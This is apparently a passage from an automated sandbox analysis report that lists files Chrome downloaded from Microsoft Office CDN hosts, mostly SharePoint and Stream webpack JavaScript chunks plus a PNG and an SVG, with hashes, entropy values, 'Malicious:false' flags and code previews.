                              Preview:(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[36074],{422058:(e,t,n)=>{"use strict";n.d(t,{j:()=>ae});var a,i=n(295610),r=n(538054),o=n(836682),s=n(262708),c=n(633472),d=n(147714),l=n(188830),u=n(502402),f=n(230336),p=n(485942),m=n(82999),_=n(383417),h=n(686247),b=n(252400),g=n(567022),v=n(610388),y=n(351329),S=n(607539),D=n(551638),I=function(){function e(e){var t=this;this.playbackRates=D.a,this.playerStats={ttlMs:void 0,ttirMs:void 0},this.playState=new S.Y(void 0),this.autoplayFailed=new S.Y(void 0),this.isFullscreen=new S.Y(void 0),this.loadingState=new S.Y("None"),this.currentTimeInSeconds=new S.Y(void 0),this.seeking=new f.y,this.isActive=new f.y,this.isPlayerReady=new S.Y(!1),this.isPreRoll=new S.Y(!0),this.isAltTrackReady=new S.Y(!1),this.audioStreamSwitchingFailed=new S.Y(!1),this.muted=new S.Y(!1),this.loop=new S.Y(!1),this.mediaDurationInSecondsV2=new S.Y(0),this.playbackRate=new S.Y(1),this.downloadBitrate=new S.Y(void 0),this.available
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):156
                              Entropy (8bit):5.277954784456586
                              Encrypted:false
                              SSDEEP:
                              MD5:F2DEFE88DF40CD519171A6BBF6D316D9
                              SHA1:1EE3A19EA974F8C434A466670A277ECEE1B87DE6
                              SHA-256:1F2AD25C63EC3A1A34FF67623758A896F2978B0A20B3C8C3222FC4EEA9BDED40
                              SHA-512:BAD54ACEC0C7B1D3E34ED88FFF4D1CA422F33D2B577360FAFA0A0AD3D1DF6B04531D2DD24EE1A9C77375C281E3FC762CB306DB8C466C34EAF70788ED8BA95371
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/1237.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1237],{4370:(e,t,n)=>{n.r(t),n.d(t,{teamifyStrings:()=>a});var a=n(7763)}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (19642)
                              Category:downloaded
                              Size (bytes):101529
                              Entropy (8bit):5.3068867393400065
                              Encrypted:false
                              SSDEEP:
                              MD5:FDF4228AE6A5CA1C416E3691B9170F56
                              SHA1:76FC12C79E2ED35C72BF831219CEF031FBE3F6D3
                              SHA-256:BD391BF8C5A2EEAF316B929B1521E160D2E96AF41090D3037166304389A9C874
                              SHA-512:28D6000FE1B9D6880ACD54B33D590AA34AC1D8B22EB51E0BD976AD509D65C9683CA8D228F3BABBAB4F60EF33A8B7F294FBF8334EE73D274E248622C050267A9F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/53239.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[53239],{335877:(e,t,n)=>{n.d(t,{w:()=>r});var a=n(441736),i=n(522673);function r(e,t,n){var r=(0,a.X)(e,function(e){return t===e||e.hasAttribute(i.Y)},n);return null!==r&&r.hasAttribute(i.Y)}}.,414514:(e,t,n)=>{n.d(t,{k:()=>T});var a,i=n(295610),r=n(408156),o=n(491684),s=n(418707),c=n(505620),d=n(746381),l=n(760245),u=n(228903),f=n(259706),p=n(759791),m=n(594664),_=n(761270),h=n(604400),b=n(166028),g=n(335877),v=n(299413),y=n(794367),S=n(138968),D="data-is-focusable",I="data-focuszone-id",x="tabindex",C="data-no-vertical-wrap",O="data-no-horizontal-wrap",w=999999999,E=-999999999;function A(e,t){var n;"function"==typeof MouseEvent?n=new MouseEvent("click",{ctrlKey:null==t?void 0:t.ctrlKey,metaKey:null==t?void 0:t.metaKey,shiftKey:null==t?void 0:t.shiftKey,altKey:null==t?void 0:t.altKey,bubbles:null==t?void 0:t.bubbles,cancelable:null==t?void 0:t.cancelable}):(n=document.createEvent("MouseEven
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (23842)
                              Category:downloaded
                              Size (bytes):99944
                              Entropy (8bit):5.358783260026105
                              Encrypted:false
                              SSDEEP:
                              MD5:F3A9C092D24274E9E004427B9870FAB7
                              SHA1:1A82EF69934CF7EFDE65048EF5634A02D4058245
                              SHA-256:637E36BEA159961AE3F9759D0FAFB57D9F1B31A695753C840E7458D23AFB9786
                              SHA-512:2CFC4698DD97F42FD9CBE72166668785286DDFAA5AA50AF0BAE2C1DF5A939A172D7664203EE7B9081E9EC6916B2165AD7C86C332ECC16A9D22A5501452EF11CC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/92.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[92,36],{984:(e,t,n)=>{n.r(t),n.d(t,{DataBatchOperationHelper:()=>c,default:()=>d});var a=n(51),i=n(2063),r=n(77),o=n("odsp.util_578"),s=o.HW.isActivated("2b1ee267-3309-486b-8be8-994d0fcadf3f"),c=function(){function e(){}return e.getBatchOperationUrl=function(e,t){return new i.b({webAbsoluteUrl:!e&&t?new r.a(t).authority:e}).build().segment("$batch").toString()},e.processErrorResponse=function(e,t){var n={id:t};if((e=e.error?e.error:e)&&e.code){var a=e.code?e.code.split(","):e.error.code.split(","),i=Number(a[0]),r=s||"string"!=typeof e.message?e.message.value:e.message;n.error={code:i,message:r}}return{items:[n]}},e.getBatchResponseText=function(e){var t,n,a,i=[];if(e.split("\n").length>0&&(t=e.split("\n")[0]),t){n=(e=e.replace(t.trim()+"--","")).split(t);for(var r=1;r<n.length;r++)(a=n[r].split("\n\r")).length>2&&i.push(a[2])}return i},e.processBatchResponse=function(e,t,n){var a,i,r,o,s=[],c=!1;if(e&&e.spli
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 1139 x 859, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):119666
                              Entropy (8bit):7.961741365330946
                              Encrypted:false
                              SSDEEP:
                              MD5:8782A49E7191BDF3312FB2A10B9E09D9
                              SHA1:8F146A1588201033B5D84EC7642E4535FB012DDC
                              SHA-256:D61B6DAE0858CAA15A69BC36C4F18ED4532BC2AED5D16033FE915FCBC23E63AB
                              SHA-512:7C17D280EBE8EB876C01FE69A342CE04C87A02E0FABBC6636CC324E843D240E37C86725474245398EB5D91CE1BCF88594A0174517FF1A5A75C78D71AFFE11DCD
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR...s...[........... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...%...%.IR$.....tIME......+........IDATx...gt..'./z!....`.H.z..l.r..$v&NN.L.d23..b...../..9g&.)....J.,.EV.*)...`..... ..._..o...([......3...~........\.....U ..B.!..B.!.&...@.. .....B.!..B.!....s.!..B.!..B6....B.!..B.!.l ..!..B.!..B..@(.C.!..B.!....P0..B.!..B.!d..`.!..B.!..B..B..B.!..B.!.....9..B.!..B.!...s.!..B.!..B6....B.!..B.!.l ..!..B.!..B..@(.C.!..B.!....P0..B.!..B.!d..`.!..B.!..B..B..B.!..B.!.....9..B.!..B.!...s.!..B.!..B6....B.!..B.!.l ..!..B.!..B..@(.C.!..B.!....P0..B.!..B.!d..`.!..B.!..B..B.......G..6.G.....y.....*..p...B...sL.!..x................K$..d2.................b1d2.D".. ...........@ .T*.T*.@ ..\..>.....}.L..-..biii.Kj../.....z.....T*.H$ZqL.-.\.w>... .nw.....P..L..D..o.~?.^/...@..w..u..^..b............^.p8...6..ry..,S.@...I$.A$.A".@".@,^.xG..@ ...@ ..P.?....y.2.y.D"..ry.[~.....E ..........*..B!..~~......~.Y....zo.z...0..`......B!..b~.#......@ .`
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (21591)
                              Category:downloaded
                              Size (bytes):32845
                              Entropy (8bit):5.45786136840473
                              Encrypted:false
                              SSDEEP:
                              MD5:724A886F85DC9BB3FCEF042937C4460B
                              SHA1:8D75741BCAE21DA14EA8DA1A9A755FFBD8BEE678
                              SHA-256:F90144459DD0DCB09D8D18B223B290FE7B378499F1B388E6D241F8C3F9F627D3
                              SHA-512:25ABFBAB60E5BCF162F306D24E8A8F35532B7B358A51122BBCE9A8BCB1786B49917464955BCE9403C8AABC3BA3501BA0E11B710CD13CE8136DA9C91DF0580F7E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/28.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[28],{3689:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return h},c:function(){return _},d:function(){return p},e:function(){return d},f:function(){return u},g:function(){return c},h:function(){return f},i:function(){return l}});var a=n(47),i=n(3026),r=n(1563),o=n(1562),s=n(3687);function c(e){return!!e.RemoteItem}function d(e){return!c(e)&&1===Number(e["Created_x0020_Date.ifnew"])}function l(e){return Number(null==e?void 0:e.PrincipalCount)>0||c(e)}function u(e){var t=(0,s.a)(e);if(void 0===e.PermMask&&void 0===t)return!1;var n=null==t?void 0:t.mountPoint,i=n&&n.permMask;if(i&&!a.a.hasItemPermission({permissions:i},a.a.editListItems))return!0;var o=(0,r.a)(e.PermMask);return!a.a.hasItemPermission({permissions:o},a.a.editListItems)}function f(e){return(Number(e._ComplianceFlags||"0")&i.a.TagPolicyRecord)===i.a.TagPolicyRecord}function p(e){var t=Number(e._VirusStatus)||0;return 0!==t&&3!==t}funct
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5590)
                              Category:downloaded
                              Size (bytes):15530
                              Entropy (8bit):5.486817027467487
                              Encrypted:false
                              SSDEEP:
                              MD5:828D70DB6B88849E069F3786458D4963
                              SHA1:6A38F3781CB55D090F04DC437A1F0F11566E4C0B
                              SHA-256:CCAF860209C65A670C1AA16D9DA35C02804A11CF3A4DA4348C57ACBF07C3A55F
                              SHA-512:7B800AA7A436A45FD679B9BD2FCCF1BEE0406027CF1E633F2399557581EEE04CE14E7FC9B98A27994455321CC889A83A1952754EF3E3CEE636B4D4054EEBE5F9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/45324.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[45324],{651407:(e,t,n)=>{n.d(t,{R:()=>f});var a=n(408156),i=n(235094),r=n(336505),o=n(550948),s=n(501544);const c=(0,o.s)({root:{B6of3ja:"fvjh0tl",t21cq0:["f1rnx978","f1q7jvqi"],jrapky:"fd1gkq",Frg6f3:["f1q7jvqi","f1rnx978"],a9b677:"f14z66ap",Bn0qgzm:"f1vxd6vx",oivjwe:"fg706s2",B9xav0g:"frpde29"}},{d:[".fvjh0tl{margin-top:4px;}",".f1rnx978{margin-right:-5px;}",".f1q7jvqi{margin-left:-5px;}",".fd1gkq{margin-bottom:4px;}",".f14z66ap{width:auto;}",".f1vxd6vx{border-bottom-width:var(--strokeWidthThin);}",".fg706s2{border-bottom-style:solid;}",".frpde29{border-bottom-color:var(--colorNeutralStroke2);}"]});var d=n(878542),l=n(218777),u=n(402904);const f=a.forwardRef((e,t)=>{const n=((e,t)=>({components:{root:"div"},root:i.wx((0,r.h)("div",{role:"presentation","aria-hidden":!0,...e,ref:t}),{elementType:"div"})}))(e,t);return(e=>{const t=c();e.root.className=(0,s.z)("fui-MenuDivider",t.root,e.root.c
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (27756)
                              Category:downloaded
                              Size (bytes):51348
                              Entropy (8bit):5.411423738278447
                              Encrypted:false
                              SSDEEP:
                              MD5:EFBDFEB0ECBF5002A456A9A50673891C
                              SHA1:85E7F58588BCDD9175894874A59870770FA9A39C
                              SHA-256:23D53C4C81A6CE2E8711A1344B15C856E561C56B1ED3E026B831D37D69A3F92B
                              SHA-512:2CC7AC1852B786D874A7DEA61D199D06AB826238B04838BF40CFF6110E4658A72541961BB69FB26818F9A4114754855EE0C2593BE20FDDEE45DFB10D831F6B85
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/48.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[48],{1807:(e,t,n)=>{n.d(t,{a:()=>h,b:()=>g,c:()=>m,d:()=>v});var a=n("tslib_102"),i=n(1),r=n(20),o=n(3),s=n(39),c=n(1313),d=n("fui.core_238"),l=n("fui.util_150"),u=n(1808),f=n(175),p=n(40);function m(e){var t,n=e.htmlElementId,d=e.group,l=e.rowIndex,m=e.groupNameClickActionKey,_=e.groupToggleClickActionKey,h=e.expandButtonAriaLabel,v=void 0===h?"":h,y=e.selectGroupItemsAriaLabel,S=void 0===y?"":y,D=e.groupHeaderRowAriaLabel,I=void 0===D?"":D,x=e.depth,C=e.maxDepth,O=e.fieldDetails,w=e.groupByFieldName,E=void 0===w?"":w,A=e.collapsedGroupKeysSet,L=e.groupHeaderTitleRenderer,k=(0,s.d)([{key:_}]),M=O.length,P=[c.k];P=x===C?P.concat([c.l]):P.concat([c.m]),d.isSelected&&(P=P.concat([p.G]));var T=(0,s.d)([{key:o.Y}]),U={group:d,columnCount:M,groupByFieldName:E,groupNameClickActionKey:m};return(0,i.h)("div",(0,a.W_)({key:d.key,id:n,class:P.join(" "),"aria-selected":d.isSelected,"aria-expanded":!d.isCollapsed,"aria-l
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                              Category:downloaded
                              Size (bytes):199
                              Entropy (8bit):6.766983163126765
                              Encrypted:false
                              SSDEEP:
                              MD5:21B761F2B1FD37F587D7222023B09276
                              SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                              SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                              SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                              Malicious:false
                              Reputation:unknown
                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg
                              Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11293)
                              Category:downloaded
                              Size (bytes):512336
                              Entropy (8bit):5.038123594481461
                              Encrypted:false
                              SSDEEP:
                              MD5:CCF53937F7E374EBA03028E14B73E00B
                              SHA1:C68EA215F9EE9E097B47B8E58CD44BC806D29428
                              SHA-256:2007C689840578217A63A2665C9DF5E4AE5641E7FBE045F5F01DC3FC965B97B8
                              SHA-512:1C8833CF4A374842D09ACB4454AE6AA8B388B5203030709F33517ABDC81A613E8C7993C53F3FB73959D3659B8151637ED816B288D699B5265F4DEBABA853CA04
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/en-gb/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6695:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7491:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4168)
                              Category:downloaded
                              Size (bytes):5798
                              Entropy (8bit):5.305015766342101
                              Encrypted:false
                              SSDEEP:
                              MD5:F12A1C363AF6CF43F0FD3D57511B45AD
                              SHA1:28F7C497AF4B091A81F4F63E24BE959BCF7EF8AC
                              SHA-256:E7D62656C64FD9388B1FBA924F71D2E12C1BA32F25449BA4925303993508876F
                              SHA-512:0D32A550D7DF43118F5B02C51C2F7BC40A1A7555C9611539B0A47A3310C6E3043AFF33ADFD56E30EB49F0DB26B0A29E737BC0D70E9884D20CDD52D0A8B2339FB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/22.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[22],{1147:(e,t,n)=>{n.d(t,{a:()=>r});var a=n(5),i=n(149);function r(e,t,n){if(e.ViewType&&e.Id){var r=i.a.isAppView(e),o=e.Hidden&&!r,s=n===a.c.pictureLibrary&&"2"===e.BaseViewId&&window.location.pathname.toLowerCase()!==e.ServerRelativeUrl.toLowerCase();if(t||!o&&!s){var c=new i.a(e);if(c.viewType)return c}}}}.,652:(e,t,n)=>{n.r(t),n.d(t,{CustomFormatter:()=>a.CustomFormatter,getCustomFormatterEventClassNames:()=>v,getCustomFormatterRowClassNames:()=>g,getCustomFormatterRowHTML:()=>y,handleCustomFormatterAction:()=>S,makeCustomFormatterFieldRenderer:()=>d});var a=n("custom-formatter-lib"),i=n("tslib_102"),r=n(3),o=n(107),s=n(68),c=n(1350);function d(e,t){var n=o.a.CustomFormatter;return n&&e.hasCustomFormatters?function(a){var o,d=a.field,l=a.fieldKey,u=a.fieldIndex,f=a.item,p=a.rowIndex,m=a.isItemPendingSave,_=a.isDraggable,h=a.additionalClasses,b=JSON.parse(JSON.stringify(f)),g=f[d.realFieldName],v=("Multi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (27004)
                              Category:downloaded
                              Size (bytes):34505
                              Entropy (8bit):5.270005836117303
                              Encrypted:false
                              SSDEEP:
                              MD5:F5CD7F20E557B99373F44DD7E5DEF37C
                              SHA1:47F2AC4C99B46287E01BACAE61B6D97EFA918B50
                              SHA-256:F26A5451A509A75C07A7940666111016137952BCEC9B10BB0E9942C9D6580551
                              SHA-512:C41E94199F14116B3E727F3409E79A2369DD98D6DFE5B04443A675541860AB1B8883AAF16119CF46806D882FFCE3F6F4A66E82073F489F45938F44B9F7C011F8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1555.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1555],{3895:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lcom_959"),o=n("fui.lcoms_307"),s=n("fui.lco_35"),c=n("fui.util_150"),d=n(3896),l=(0,s.dsi)(),u=function(e){function t(t){var n=e.call(this,t)||this;return n._overflowSet=i.createRef(),n._resizeGroup=i.createRef(),n._classNames={},n._onRenderData=function(e){return i.createElement(s.z5q,{className:(0,c.N0)(n._classNames.root),direction:s.GIy.horizontal,role:"menubar","aria-label":n.props.ariaLabel},i.createElement(r.Tg,{role:"none",componentRef:n._overflowSet,className:(0,c.N0)(n._classNames.primarySet),doNotContainWithinFocusZone:!0,items:e.primaryItems,overflowItems:e.overflowItems.length?e.overflowItems:void 0,onRenderItem:n._onRenderItem,onRenderOverflowButton:n._onRenderOverflowButton}),e.middleItems&&e.middleItems.length>0&&i.createElement(r.Tg,{role:"none",className:(0,c.N0)(n._classNames.middleSe
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (19261)
                              Category:downloaded
                              Size (bytes):479006
                              Entropy (8bit):5.409816744333884
                              Encrypted:false
                              SSDEEP:
                              MD5:58E060D7ECD08989686C6F42A132C718
                              SHA1:A266E46CA3BEE6110457C66BFE756CA2B58F6BF9
                              SHA-256:205EEB7CFC35CFD8BF7966F8FFADC5F12F82130047272670FA5E5A4CB6835EB2
                              SHA-512:7B16D714A1366AAE81AAE49D25A8E8D0809589B11F830DE40C5DD50C56F6747ACEE222C380400C666DD00F5A97DA780B68A05373313E043D917892B39314807C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/plt.metaosfilebrowserdataprefetch.js
                              Preview:/*! For license information please see plt.metaosfilebrowserdataprefetch.js.LICENSE.txt */.var __webpack_result__;(()=>{var e=[(e,t,n)=>{"use strict";n.d(t,{a:()=>c,b:()=>s});var a={};n.r(a),n.d(a,{optionalDiagnostic:()=>r,requiredDiagnostic:()=>i,requiredService:()=>o});var i="requiredDiagnostic",r="optionalDiagnostic",o="requiredService",s=a,c={String:1,Number:2,Boolean:3,Object:4,Array:5,Enum:6}}.,(e,t,n)=>{"use strict";var a;n.d(t,{a:()=>i}),function(e){e[e.absolute=0]="absolute",e[e.relative=1]="relative",e[e.serverRelative=2]="serverRelative",e[e.dataUrl=3]="dataUrl"}(a||(a={}));var i=function(e,t){var n;void 0===e&&(e="");var i=null!==(n=null==t?void 0:t.allowDataUrl)&&void 0!==n&&n,o=e.indexOf("//"),s=e.indexOf("/"),c=o>-1&&o<=s?o+"//".length:-1,d=function(e,t){if(t>-1){var n=e.indexOf("/",t);return n>-1?e.slice(0,n):e}return""}(e,c),l=d&&d.slice(c),u=e.slice(d.length),f=d?a.absolute:i&&r.test(e)?a.dataUrl:"/"===u[0]?a.serverRelative:a.relative,p=u.split("/");this.authority=d,t
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3701)
                              Category:downloaded
                              Size (bytes):3986
                              Entropy (8bit):5.186730873717487
                              Encrypted:false
                              SSDEEP:
                              MD5:6E82CBD20121F413E88DD5EA12F3BFEE
                              SHA1:59EAE4F4721A23A7A21EB26A63623A1EC062A8F6
                              SHA-256:C70D47F85ACEB1F5C0BFE719F14D114267546066754F3EE76C3030EC7280AFF3
                              SHA-512:7828745DAEC36052F776DB1F8D4A36077DE6EDDE1330183FC7CEDDB45DF3901B27730832F79E61537E03FB5F35DAC7B8A20BC3FFB8656E1B7C2F26D75B63634D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/95.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[95],{713:(e,t,n)=>{n.r(t),n.d(t,{default:()=>u,resourceKey:()=>f});var a=n("odsp.util_578"),i=n(117),r=n(546),o=n(547),s=n(544),c=n(105),d=n(1796),l=function(){function e(e,t){this._isConfigured=!1,this._suggestionsSetUp=!1,this._resources=t.resources,this._searchBoxDataSource=t.searchBoxDataSource,this._config=t.searchBoxConfig,this._scope=new i.a,this._getViewParams=function(){throw new Error("Search box not configured")},this._searchInstrumenter=this._config.getInstrumenter()}return e.prototype.configureSearchBox=function(e){var t=this;this._config.isEnabled()&&(this._getViewParams=e,this._resources.consumeAsync(s.a).then(function(e){t._suiteNavProvider=e,t._suiteNavProvider.getO365Shell().then(function(e){e.OnHasMember("Search",function(){var n=e.Search,a=n.OnSubmitSearch(t._onSubmitSearchCallback.bind(t)),i=n.OnSearchBoxActivated(t._onSearchBoxActivatedCallback.bind(t)),r=n.OnSearchBoxDeactivated(t._onSe
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11654)
                              Category:downloaded
                              Size (bytes):22590
                              Entropy (8bit):5.159952414390992
                              Encrypted:false
                              SSDEEP:
                              MD5:477FC4973709CAA865233622EADA9C20
                              SHA1:932F4EDA717F134407D4DE49B5800E4AFD936D13
                              SHA-256:08CBFD617357CE1FAEF98C9628023CB5F6D03A83FEF3A14142B465A61AADBE71
                              SHA-512:B3C7AB64696077A1F5C379713EBD846E049BB2AFF6B762540BEBFD3D142089B6FDB82B76078C9ABCB86AEAD0DA7602BE294F07AE7A6CBF7465B006325835425F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/19.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[19],{444:(e,t,n)=>{n.d(t,{a:()=>c});var a=n("knockout-lib"),i=n(1309);const r=function(){function e(){this.handlers=[]}return e.prototype.register=function(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];for(var n=0;n<e.length-1;n++)this.handlers.push({pattern:e[n],callback:e[e.length-1]})},e.prototype.match=function(e,t){for(var n=0;n<this.handlers.length;n++)if(this._compare(this.handlers[n].pattern,e)){var a=this.handlers[n].callback.call(this,e,t);return"boolean"!=typeof a||a}return!1},e.prototype._compare=function(e,t){for(var n in e)if(e.hasOwnProperty(n)&&e[n]!==t[n])return!1;return!0},e}();var o=n(55),s=n("fui.core_238");const c=function(){function e(){}return e.init=function(t,n,r,s,c){var d,l=a.utils.unwrapObservable(n()),u=r(),f=new o.b(null),p={mode:"multi",direction:"custom",properties:{selected:"selected",focused:"focused",activeClass:"selection-active"}},m=l.selectionModel||new i.a;
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):87588
                              Entropy (8bit):5.353043981129596
                              Encrypted:false
                              SSDEEP:
                              MD5:65C874C319B10216BECBE6227FCE7501
                              SHA1:44407C14911B1C58C51C7CEBB6BE1F3F067F88F5
                              SHA-256:82F04E6CC3E3A5822077372B8B44748B0A2142740F64E6E2FEC83B60AA589A21
                              SHA-512:F5116E5BB4E99459EBC2B1D3AFE33953DF8637862471AF45FB73D00765FBB4008FF38F51890A7623982D410BA5EF102AFE4942A14E52E7A106BF49DCAE7C5525
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.components.migration/fui.lcom-a04e653f.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcom"],{"fui.lcom_959":(e,t,n)=>{n.d(t,{n_:()=>i,xN:()=>f,CQ:()=>A,Dx:()=>b,GC:()=>x,Ce:()=>M,k3:()=>fe,P6:()=>m,PQ:()=>pe,L0:()=>u,TF:()=>Ie,tM:()=>he,UY:()=>ve,Kj:()=>Oe,A8:()=>a,Kp:()=>ct,kL:()=>G,FA:()=>Ye,_Q:()=>U,pU:()=>H,Tg:()=>j,jo:()=>Ae,Bw:()=>Me,ir:()=>Be,Ys:()=>Fe,a_:()=>Ge,Ur:()=>Y,Uy:()=>R,XY:()=>J,d5:()=>qe,Rj:()=>Qe,Xp:()=>et,Gk:()=>at,ts:()=>ht,h9:()=>gt,u9:()=>yt,Iw:()=>vt,UN:()=>St,XU:()=>Mt,qn:()=>Tt,sZ:()=>Ht,lT:()=>te,HR:()=>re,_j:()=>ce,Eh:()=>ae,Is:()=>ot,U0:()=>Dt,Br:()=>rt,De:()=>lt,aq:()=>le,jw:()=>it,SF:()=>V,ZL:()=>z,Xi:()=>I,su:()=>k,ci:()=>B,zn:()=>de,tG:()=>ne,GG:()=>se,d8:()=>ge,i2:()=>Ce,B5:()=>ke,OE:()=>l,Fo:()=>ze,HL:()=>Ke,dX:()=>nt,v5:()=>ut,fc:()=>p,Xo:()=>Ft,nW:()=>X,R8:()=>$,Fh:()=>Z,Ru:()=>Ct,x:()=>xt,FO:()=>Te,gM:()=>st,lN:()=>Et,V3:()=>Ue,x5:()=>Pe,Bp:()=>$e,L8:()=>wt,By:()=>Lt,a$:()=>kt});var a,i,r=n("tslib_102"),o=n("react-lib"),s=n("fui.util_150");!function(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5206)
                              Category:downloaded
                              Size (bytes):7404
                              Entropy (8bit):5.4688596250393235
                              Encrypted:false
                              SSDEEP:
                              MD5:2C6EE46F03A7E8D55A207FC535BB3A1A
                              SHA1:5853F7AFF5833C0241F6E4DDAF6077A794AC793B
                              SHA-256:707874E53D8F053EC982A702838E80707E34DD30AB21F4A7328B268F120718DE
                              SHA-512:609D53CA6BBC73D3EFDD355A90BB6F7351B63020C38BD123EC457AB6AE8966713BFDA90ED1FF802F2A57A5C5767AFE78D408A141916A9B3AAF989BF4AFE6E614
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1078.js
